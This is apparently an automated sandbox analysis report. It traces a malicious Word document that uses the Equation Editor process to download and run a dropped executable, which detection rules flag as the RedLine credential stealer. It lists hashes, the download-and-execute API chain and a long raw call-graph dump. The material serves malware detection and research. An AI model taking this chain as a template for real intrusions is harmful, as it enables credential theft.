                                                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                Imagebase:0x13fd30000
                                                File size:1'423'704 bytes
                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Target ID:2
                                                Start time:12:27:04
                                                Start date:24/06/2024
                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                Imagebase:0x400000
                                                File size:543'304 bytes
                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:5
                                                Start time:12:27:08
                                                Start date:24/06/2024
                                                Path:C:\Users\user\AppData\Roaming\notorious53209.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\notorious53209.exe"
                                                Imagebase:0x880000
                                                File size:644'096 bytes
                                                MD5 hash:901A623DBCCAA22525373CD36195EE14
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                Antivirus matches:
                                                • Detection: 50%, ReversingLabs
                                                Reputation:low
                                                Has exited:true

                                                Target ID:6
                                                Start time:12:27:09
                                                Start date:24/06/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\notorious53209.exe"
                                                Imagebase:0x3f0000
                                                File size:45'248 bytes
                                                MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.387767388.0000000002400000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:8
                                                Start time:12:27:26
                                                Start date:24/06/2024
                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                Imagebase:0x400000
                                                File size:543'304 bytes
                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false


                                                  Execution Graph

                                                  Execution Coverage:8.3%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:57.8%
                                                  Total number of Nodes:166
                                                  Total number of Limit Nodes:3

                                                  Callgraph


                                                  Control-flow Graph

                                                  APIs
                                                  • LoadLibraryW.KERNEL32(005AC13D), ref: 005AC14B
                                                  • URLDownloadToFileW.URLMON(00000000,005AC176,?,00000000,00000000), ref: 005AC1CE
                                                  • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 005AC22C
                                                  • ExitProcess.KERNEL32(00000000), ref: 005AC244
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0059E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_59e000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateDownloadExitFileLibraryLoad
                                                  • String ID:
                                                  • API String ID: 3376099886-0
                                                  • Opcode ID: fa2bcef1878008ff4faed326ff31fbfcea084fd9c2f02389954a5b3d092cfdbe
                                                  • Instruction ID: 0e8fbf6b3b5855f1381d461bbae6a010dda23c0e932d8567775497d46ef95711
                                                  • Opcode Fuzzy Hash: fa2bcef1878008ff4faed326ff31fbfcea084fd9c2f02389954a5b3d092cfdbe
                                                  • Instruction Fuzzy Hash: 0B41E2A950C3C51FC712A7B04E6EA9DBF657E93300B0CCACED0D50A1A3D7689605D756

                                                  Control-flow Graph

                                                  APIs
                                                  • LoadLibraryW.KERNEL32(005AC13D), ref: 005AC14B
                                                    • Part of subcall function 005AC165: URLDownloadToFileW.URLMON(00000000,005AC176,?,00000000,00000000), ref: 005AC1CE
                                                    • Part of subcall function 005AC165: CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 005AC22C
                                                    • Part of subcall function 005AC165: ExitProcess.KERNEL32(00000000), ref: 005AC244
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0059E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_59e000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateDownloadExitFileLibraryLoad
                                                  • String ID:
                                                  • API String ID: 3376099886-0
                                                  • Opcode ID: 11022e197e687a2df6d0a6c112975e3d82a1bb2db2132908dc8ef749d180d3e1
                                                  • Instruction ID: 9898b77b5e2da2a49343f48e1df7173b52ee7443874066f86d4a5ef4d111896d
                                                  • Opcode Fuzzy Hash: 11022e197e687a2df6d0a6c112975e3d82a1bb2db2132908dc8ef749d180d3e1
                                                  • Instruction Fuzzy Hash: F131A16950C3C52BCB12A7B04D6ABADBF65BFD3700F08C6CEE0C60A0A3D6648505D756

                                                  Control-flow Graph

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0059E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_59e000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateDownloadExitFile
                                                  • String ID:
                                                  • API String ID: 2126523932-0
                                                  • Opcode ID: ba75ab135124378094b088de7fd64711136ff93d0e74768a535ecd16e9797128
                                                  • Instruction ID: 4f66d1dc6f7d13841fe4390f2fce86902e90ae1e9ec395cb012fd40a4fc72f6b
                                                  • Opcode Fuzzy Hash: ba75ab135124378094b088de7fd64711136ff93d0e74768a535ecd16e9797128
                                                  • Instruction Fuzzy Hash: 2F216D6950C3D51BCB26A7B04CADBADBF557FD3700F08CACEE0D60A0A3D6688505D756

                                                  Control-flow Graph

                                                  APIs
                                                  • URLDownloadToFileW.URLMON(00000000,005AC176,?,00000000,00000000), ref: 005AC1CE
                                                    • Part of subcall function 005AC1E5: CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 005AC22C
                                                    • Part of subcall function 005AC1E5: ExitProcess.KERNEL32(00000000), ref: 005AC244
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0059E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_59e000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateDownloadExitFile
                                                  • String ID:
                                                  • API String ID: 2126523932-0
                                                  • Opcode ID: 9180f0b284761833f9f31796fac9cfcee9c35c59c9fab4882ec9e8daa7a07ec6
                                                  • Instruction ID: 5c4311a68a954302a39b8bc1fd270e1aa797c13f4da01a9d9270e830546926ec
                                                  • Opcode Fuzzy Hash: 9180f0b284761833f9f31796fac9cfcee9c35c59c9fab4882ec9e8daa7a07ec6
                                                  • Instruction Fuzzy Hash: 1411CE7D40830126DB14E7E09D89BAEBF5ABFE7B00F548A48E1D10A157DA74CA089665

                                                  Control-flow Graph

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0059E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_59e000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateExit
                                                  • String ID:
                                                  • API String ID: 126409537-0
                                                  • Opcode ID: fdbaa3d9f1220df4e5171d05b8988b32f4ca09a6248049512152c847acd2eb6c
                                                  • Instruction ID: d2b3dbc95af5d5a643b4aad1025bd1f6f729026fb1eeca9efd8e4e6d0dcf37ed
                                                  • Opcode Fuzzy Hash: fdbaa3d9f1220df4e5171d05b8988b32f4ca09a6248049512152c847acd2eb6c
                                                  • Instruction Fuzzy Hash: F111226D10834265CB20F6F09884BEEBFA5FFD7700F88CA4AE8D14A106D634C886C729

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 005AC22C
                                                    • Part of subcall function 005AC23F: ExitProcess.KERNEL32(00000000), ref: 005AC244
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0059E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_59e000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateExit
                                                  • String ID:
                                                  • API String ID: 126409537-0
                                                  • Opcode ID: 4581ba8be27b4f40f7c6f75f124480c8923545fa759ab39b88aabc2470b18446
                                                  • Instruction ID: 2e654e9d93b0b7a83429da91cba05beff9405096ba7fc28c91de7b6e5614c697
                                                  • Opcode Fuzzy Hash: 4581ba8be27b4f40f7c6f75f124480c8923545fa759ab39b88aabc2470b18446
                                                  • Instruction Fuzzy Hash: BA01F2AD14434251DB3076E498447EE7F65BFD7710FC88E4BE8C50814AD56485C39719

                                                  Control-flow Graph

                                                  APIs
                                                  • ExitProcess.KERNEL32(00000000), ref: 005AC244
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0059E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_59e000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                  • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                  • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                  • Instruction Fuzzy Hash:

                                                  Control-flow Graph

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0059E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_59e000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                  • Instruction ID: 7d329befb832e07dd2370553dfb1a8a3680961969641471f58564082ecf83e5d
                                                  • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                  • Instruction Fuzzy Hash: DAD052352024028FD304DF44C980E5BFB6AFFC8B10B24C268E4144BA1AD730EC92CAA0

                                                  Control-flow Graph

                                                  APIs
                                                  • ExitProcess.KERNEL32(005AC07C), ref: 005AC08E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0059E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_59e000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  • Opcode ID: 5e5e9c5a838522a5071c4c4388ef68339b0b40dd025a6b83306cf42350c3e337
                                                  • Instruction ID: d790b7ad193ad6bcf942ffdea38ca08ee7d1a69ea5e8d6393c62bce78389209f
                                                  • Opcode Fuzzy Hash: 5e5e9c5a838522a5071c4c4388ef68339b0b40dd025a6b83306cf42350c3e337
                                                  • Instruction Fuzzy Hash: CD21F3AAA0E7C04FD71397745EAE15CBF607E13204B1C86CFC5C14E2A3E2599A0AD386

                                                  Execution Graph

                                                  Execution Coverage:4.1%
                                                  Dynamic/Decrypted Code Coverage:0.4%
                                                  Signature Coverage:4.8%
                                                  Total number of Nodes:2000
                                                  Total number of Limit Nodes:57
99946 885906 61 API calls 99941->99946 99944 8ed334 99942->99944 99948 889997 85 API calls 99943->99948 99945 8877c7 60 API calls 99944->99945 99947 8ed33d 99945->99947 99946->99943 99950 889997 85 API calls 99947->99950 99949 8ed457 99948->99949 100200 885956 99949->100200 99952 8ed349 99950->99952 100214 8846f9 99952->100214 99955 8ed49e 99960 8ed4c9 99955->99960 99961 8ed500 99955->99961 99956 8ed46a GetLastError 99958 8ed483 99956->99958 99957 8ed35e 99959 887c8e 60 API calls 99957->99959 99964 8ed3f3 Mailbox 99958->99964 100270 885a1a CloseHandle 99958->100270 99962 8ed391 99959->99962 99963 8a0ff6 Mailbox 60 API calls 99960->99963 99966 8a0ff6 Mailbox 60 API calls 99961->99966 99965 8ed3e3 99962->99965 100265 8e3e73 99962->100265 99967 8ed4ce 99963->99967 99964->99920 100269 889c9c 60 API calls 99965->100269 99972 8ed505 99966->99972 99973 8877c7 60 API calls 99967->99973 99974 8ed4df 99967->99974 99972->99964 99976 8877c7 60 API calls 99972->99976 99973->99974 100271 8ef835 60 API calls 2 library calls 99974->100271 99975 8ed3a5 99978 887f41 60 API calls 99975->99978 99976->99964 99979 8ed3b2 99978->99979 100268 8e3c66 64 API calls Mailbox 99979->100268 99981->99940 99981->99964 99982 8ed3bb Mailbox 99982->99965 99984 889997 85 API calls 99983->99984 99985 8f4787 99984->99985 100339 8863a0 99985->100339 99987 8f47bc 99991 8f47c0 99987->99991 100364 889bf8 99987->100364 99988 8f4797 99988->99987 99989 88a000 332 API calls 99988->99989 99989->99987 99991->99920 99993 889bf8 60 API calls 99992->99993 99994 89213b 99993->99994 99996 8a0ff6 Mailbox 60 API calls 99994->99996 99998 8c69af 99994->99998 99997 892154 99996->99997 100000 892164 99997->100000 100001 885906 61 API calls 99997->100001 99999 892189 99998->99999 100403 8ef7df 60 API calls 99998->100403 100008 892196 99999->100008 100404 889c9c 60 API calls 99999->100404 100002 889997 85 API calls 100000->100002 100001->100000 100004 892172 100002->100004 100006 885956 68 API calls 100004->100006 100005 
8c69f7 100007 8c69ff 100005->100007 100005->100008 100009 892181 100006->100009 100405 889c9c 60 API calls 100007->100405 100010 885e3f 2 API calls 100008->100010 100009->99998 100009->99999 100402 885a1a CloseHandle 100009->100402 100012 89219d 100010->100012 100014 8c6a11 100012->100014 100015 8921b7 100012->100015 100017 8a0ff6 Mailbox 60 API calls 100014->100017 100016 8877c7 60 API calls 100015->100016 100018 8921bf 100016->100018 100019 8c6a17 100017->100019 100385 8856d2 100018->100385 100021 8c6a2b 100019->100021 100406 8859b0 ReadFile SetFilePointerEx 100019->100406 100026 8c6a2f _memmove 100021->100026 100407 8e794e 60 API calls 2 library calls 100021->100407 100024 8921ce 100024->100026 100400 889b9c 60 API calls Mailbox 100024->100400 100027 8921e2 Mailbox 100028 89221c 100027->100028 100029 885dcf CloseHandle 100027->100029 100028->99920 100030 892210 100029->100030 100030->100028 100401 885a1a CloseHandle 100030->100401 100033 8a0ff6 Mailbox 60 API calls 100032->100033 100034 885916 100033->100034 100035 885dcf CloseHandle 100034->100035 100036 885921 100035->100036 100037 8877c7 60 API calls 100036->100037 100038 885929 100037->100038 100039 885dcf CloseHandle 100038->100039 100040 885930 100039->100040 100040->99920 100041->99920 100042->99920 100043->99916 100411 8d6636 100044->100411 100046 8d6702 100046->99918 100085 889997 100047->100085 100051 8fd242 100153 8fdbdc 93 API calls Mailbox 100051->100153 100053 8fce75 Mailbox 100053->99932 100055 8fd251 100058 8fd0db 100055->100058 100059 8fd25d 100055->100059 100056 8fcec6 Mailbox 100056->100053 100057 889997 85 API calls 100056->100057 100072 8fd0cd 100056->100072 100135 8ef835 60 API calls 2 library calls 100056->100135 100136 8fd2f3 62 API calls 2 library calls 100056->100136 100057->100056 100116 8fcc82 100058->100116 100059->100053 100064 8fd114 100131 8a0e48 100064->100131 100067 8fd12e 100137 8ea0b5 90 API calls 4 library calls 100067->100137 100068 8fd147 100138 88942e 100068->100138 100071 
8fd139 GetCurrentProcess TerminateProcess 100071->100068 100072->100051 100072->100058 100076 8fd2b8 100076->100053 100081 8fd2cc FreeLibrary 100076->100081 100078 8fd17f 100150 8fd95d 108 API calls _free 100078->100150 100081->100053 100084 8fd190 100084->100076 100151 888ea0 60 API calls Mailbox 100084->100151 100152 889e9c 61 API calls Mailbox 100084->100152 100154 8fd95d 108 API calls _free 100084->100154 100086 8899b1 100085->100086 100095 8899ab 100085->100095 100087 8899f9 100086->100087 100088 8bf903 100086->100088 100089 8bf9fc __i64tow 100086->100089 100091 8899b7 __itow 100086->100091 100155 8a38d8 84 API calls 3 library calls 100087->100155 100096 8a0ff6 Mailbox 60 API calls 100088->100096 100101 8bf97b Mailbox _wcscpy 100088->100101 100089->100089 100093 8a0ff6 Mailbox 60 API calls 100091->100093 100094 8899d1 100093->100094 100094->100095 100097 887f41 60 API calls 100094->100097 100095->100053 100103 8fdab9 100095->100103 100098 8bf948 100096->100098 100097->100095 100099 8a0ff6 Mailbox 60 API calls 100098->100099 100100 8bf96e 100099->100100 100100->100101 100102 887f41 60 API calls 100100->100102 100156 8a38d8 84 API calls 3 library calls 100101->100156 100102->100101 100157 887faf 100103->100157 100105 8fdad4 CharLowerBuffW 100161 8df658 100105->100161 100109 8877c7 60 API calls 100110 8fdb0d 100109->100110 100168 8879ab 100110->100168 100112 8fdb24 100181 887e8c 100112->100181 100114 8fdb30 Mailbox 100115 8fdb6c Mailbox 100114->100115 100185 8fd2f3 62 API calls 2 library calls 100114->100185 100115->100056 100117 8fcc9d 100116->100117 100121 8fccf2 100116->100121 100118 8a0ff6 Mailbox 60 API calls 100117->100118 100119 8fccbf 100118->100119 100120 8a0ff6 Mailbox 60 API calls 100119->100120 100119->100121 100120->100119 100122 8fdd64 100121->100122 100123 8fdf8d Mailbox 100122->100123 100130 8fdd87 _strcat _wcscpy __wsetenvp 100122->100130 100123->100064 100124 889cf8 60 API calls 100124->100130 100125 889d46 60 API calls 100125->100130 100126 
889c9c 60 API calls 100126->100130 100127 889997 85 API calls 100127->100130 100128 8a594c 59 API calls __crtLCMapStringA_stat 100128->100130 100130->100123 100130->100124 100130->100125 100130->100126 100130->100127 100130->100128 100189 8e5b29 62 API calls 2 library calls 100130->100189 100132 8a0e5d 100131->100132 100133 8a0ef5 VirtualAlloc 100132->100133 100134 8a0ec3 100132->100134 100133->100134 100134->100067 100134->100068 100135->100056 100136->100056 100137->100071 100139 889436 100138->100139 100140 8a0ff6 Mailbox 60 API calls 100139->100140 100141 889444 100140->100141 100142 889450 100141->100142 100190 88935c 60 API calls Mailbox 100141->100190 100144 8891b0 100142->100144 100191 8892c0 100144->100191 100146 8a0ff6 Mailbox 60 API calls 100148 88925b 100146->100148 100147 8891bf 100147->100146 100147->100148 100148->100084 100149 888ea0 60 API calls Mailbox 100148->100149 100149->100078 100150->100084 100151->100084 100152->100084 100153->100055 100154->100084 100155->100091 100156->100089 100158 887fc2 100157->100158 100160 887fbf _memmove 100157->100160 100159 8a0ff6 Mailbox 60 API calls 100158->100159 100159->100160 100160->100105 100162 8df683 __wsetenvp 100161->100162 100163 8df6c2 100162->100163 100166 8df6b8 100162->100166 100167 8df769 100162->100167 100163->100109 100163->100114 100166->100163 100186 887a24 62 API calls 100166->100186 100167->100163 100187 887a24 62 API calls 100167->100187 100169 8879ba 100168->100169 100170 887a17 100168->100170 100169->100170 100171 8879c5 100169->100171 100172 887e8c 60 API calls 100170->100172 100173 8879e0 100171->100173 100174 8bef32 100171->100174 100178 8879e8 _memmove 100172->100178 100188 888087 60 API calls Mailbox 100173->100188 100175 888189 60 API calls 100174->100175 100177 8bef3c 100175->100177 100179 8a0ff6 Mailbox 60 API calls 100177->100179 100178->100112 100180 8bef5c 100179->100180 100182 887e9a 100181->100182 100184 887ea3 _memmove 100181->100184 100183 887faf 60 API calls 100182->100183 
100182->100184 100183->100184 100184->100114 100185->100115 100186->100166 100187->100167 100188->100178 100189->100130 100190->100142 100192 8892c9 Mailbox 100191->100192 100193 8bf5c8 100192->100193 100198 8892d3 100192->100198 100195 8a0ff6 Mailbox 60 API calls 100193->100195 100194 8892da 100194->100147 100196 8bf5d4 100195->100196 100198->100194 100199 889df0 60 API calls Mailbox 100198->100199 100199->100198 100272 885dcf 100200->100272 100204 8859a4 100204->99955 100204->99956 100205 885981 100205->100204 100284 885770 100205->100284 100207 885993 100301 8853db SetFilePointerEx SetFilePointerEx 100207->100301 100209 88599a 100209->100204 100210 8be030 100209->100210 100302 8e3696 SetFilePointerEx SetFilePointerEx WriteFile 100210->100302 100212 8be060 100212->100204 100213->99937 100215 8877c7 60 API calls 100214->100215 100216 88470f 100215->100216 100217 8877c7 60 API calls 100216->100217 100218 884717 100217->100218 100219 8877c7 60 API calls 100218->100219 100220 88471f 100219->100220 100221 8877c7 60 API calls 100220->100221 100222 884727 100221->100222 100223 8bd8fb 100222->100223 100224 88475b 100222->100224 100225 8881a7 60 API calls 100223->100225 100226 8879ab 60 API calls 100224->100226 100227 8bd904 100225->100227 100228 884769 100226->100228 100229 887eec 60 API calls 100227->100229 100230 887e8c 60 API calls 100228->100230 100233 88479e 100229->100233 100231 884773 100230->100231 100231->100233 100234 8879ab 60 API calls 100231->100234 100232 8847de 100235 8879ab 60 API calls 100232->100235 100233->100232 100236 8847bd 100233->100236 100246 8bd924 100233->100246 100237 884794 100234->100237 100241 8847ef 100235->100241 100321 887b52 100236->100321 100239 887e8c 60 API calls 100237->100239 100238 8bd9f4 100242 887d2c 60 API calls 100238->100242 100239->100233 100244 884801 100241->100244 100247 8881a7 60 API calls 100241->100247 100264 8bd9b1 100242->100264 100245 884811 100244->100245 100248 8881a7 60 API calls 100244->100248 100249 884818 
100245->100249 100251 8881a7 60 API calls 100245->100251 100246->100238 100253 8bd9dd 100246->100253 100259 8bd95b 100246->100259 100247->100244 100248->100245 100252 8881a7 60 API calls 100249->100252 100261 88481f Mailbox 100249->100261 100250 8879ab 60 API calls 100250->100232 100251->100249 100252->100261 100253->100238 100255 8bd9c8 100253->100255 100254 887b52 60 API calls 100254->100264 100258 887d2c 60 API calls 100255->100258 100256 8bd9b9 100257 887d2c 60 API calls 100256->100257 100257->100264 100258->100264 100259->100256 100262 8bd9a4 100259->100262 100261->99957 100324 887d2c 100262->100324 100264->100232 100264->100254 100333 887a84 60 API calls 2 library calls 100264->100333 100335 8e4696 GetFileAttributesW 100265->100335 100268->99982 100269->99981 100270->99964 100271->99964 100273 885de8 100272->100273 100274 885962 100272->100274 100273->100274 100275 885ded CloseHandle 100273->100275 100276 885df9 100274->100276 100275->100274 100277 8be181 100276->100277 100278 885e12 CreateFileW 100276->100278 100279 885e34 100277->100279 100280 8be187 CreateFileW 100277->100280 100278->100279 100279->100205 100280->100279 100281 8be1ad 100280->100281 100303 885c4e 100281->100303 100285 88578b 100284->100285 100286 8bdfce 100284->100286 100287 88581a 100285->100287 100288 885c4e 2 API calls 100285->100288 100286->100287 100316 885e3f 100286->100316 100287->100207 100289 8857ad 100288->100289 100313 88538e 100289->100313 100293 8857c4 100294 8a0ff6 Mailbox 60 API calls 100293->100294 100295 8857cf 100294->100295 100296 88538e 60 API calls 100295->100296 100297 8857da 100296->100297 100298 885d20 2 API calls 100297->100298 100299 885807 100298->100299 100300 885c4e 2 API calls 100299->100300 100300->100287 100301->100209 100302->100212 100309 885c68 100303->100309 100304 885cef SetFilePointerEx 100311 885dae SetFilePointerEx 100304->100311 100305 8be151 100312 885dae SetFilePointerEx 100305->100312 100308 8be16b 100309->100304 100309->100305 100310 885cc3 
100309->100310 100310->100279 100311->100310 100312->100308 100314 8a0ff6 Mailbox 60 API calls 100313->100314 100315 8853a0 100314->100315 100315->100286 100315->100293 100317 885c4e 2 API calls 100316->100317 100318 885e60 100317->100318 100319 885c4e 2 API calls 100318->100319 100320 885e74 100319->100320 100320->100287 100322 887faf 60 API calls 100321->100322 100323 8847c7 100322->100323 100323->100232 100323->100250 100325 887d38 __wsetenvp 100324->100325 100326 887da5 100324->100326 100328 887d4e 100325->100328 100329 887d73 100325->100329 100327 887e8c 60 API calls 100326->100327 100332 887d56 _memmove 100327->100332 100334 888087 60 API calls Mailbox 100328->100334 100330 888189 60 API calls 100329->100330 100330->100332 100332->100264 100333->100264 100334->100332 100336 8e46b1 FindFirstFileW 100335->100336 100338 8e3e7a 100335->100338 100337 8e46c6 FindClose 100336->100337 100336->100338 100337->100338 100338->99965 100338->99975 100340 887b76 60 API calls 100339->100340 100346 8863c5 100340->100346 100341 8865ca 100379 88766f 60 API calls 2 library calls 100341->100379 100343 8865e4 Mailbox 100343->99988 100346->100341 100347 8be41f 100346->100347 100348 88766f 60 API calls 100346->100348 100350 8868f9 _memmove 100346->100350 100354 887eec 60 API calls 100346->100354 100357 8be3bb 100346->100357 100361 887faf 60 API calls 100346->100361 100377 8860cc 61 API calls 100346->100377 100378 885ea1 60 API calls Mailbox 100346->100378 100380 885fd2 61 API calls 100346->100380 100381 887a84 60 API calls 2 library calls 100346->100381 100382 8dfdba 92 API calls 4 library calls 100347->100382 100348->100346 100384 8dfdba 92 API calls 4 library calls 100350->100384 100352 8be42d 100383 88766f 60 API calls 2 library calls 100352->100383 100354->100346 100356 8be443 100356->100343 100358 888189 60 API calls 100357->100358 100360 8be3c6 100358->100360 100363 8a0ff6 Mailbox 60 API calls 100360->100363 100362 88659b CharUpperBuffW 100361->100362 100362->100346 
100363->100350 100365 889c08 100364->100365 100366 8bfbff 100364->100366 100370 8a0ff6 Mailbox 60 API calls 100365->100370 100367 8bfc10 100366->100367 100368 887d2c 60 API calls 100366->100368 100369 887eec 60 API calls 100367->100369 100368->100367 100374 8bfc1a 100369->100374 100371 889c1b 100370->100371 100372 889c26 100371->100372 100371->100374 100373 889c34 100372->100373 100376 887f41 60 API calls 100372->100376 100373->99991 100374->100373 100375 8877c7 60 API calls 100374->100375 100375->100373 100376->100373 100377->100346 100378->100346 100379->100343 100380->100346 100381->100346 100382->100352 100383->100356 100384->100343 100386 8856dd 100385->100386 100387 885702 100385->100387 100386->100387 100390 8856ec 100386->100390 100388 887eec 60 API calls 100387->100388 100396 8e349a 100388->100396 100391 885c18 60 API calls 100390->100391 100393 8e35ba 100391->100393 100392 8e34c9 100392->100024 100395 885632 62 API calls 100393->100395 100397 8e35c8 100395->100397 100396->100392 100408 8e3436 ReadFile SetFilePointerEx 100396->100408 100409 887a84 60 API calls 2 library calls 100396->100409 100399 8e35d8 Mailbox 100397->100399 100410 88793a 62 API calls Mailbox 100397->100410 100399->100024 100400->100027 100401->100028 100402->99998 100403->99998 100404->100005 100405->100012 100406->100021 100407->100026 100408->100396 100409->100396 100410->100399 100412 8d665e 100411->100412 100413 8d6641 100411->100413 100412->100046 100413->100412 100415 8d6621 60 API calls Mailbox 100413->100415 100415->100413 100416 8bff06 100417 8bff10 100416->100417 100448 88ac90 Mailbox _memmove 100416->100448 100557 888e34 60 API calls Mailbox 100417->100557 100421 88b685 100562 8ea0b5 90 API calls 4 library calls 100421->100562 100422 8a0ff6 60 API calls Mailbox 100443 88a097 Mailbox 100422->100443 100426 88b5d5 100428 8881a7 60 API calls 100426->100428 100438 88a1b7 100428->100438 100429 8c047f 100561 8ea0b5 90 API calls 4 library calls 100429->100561 100430 88b5da 100567 
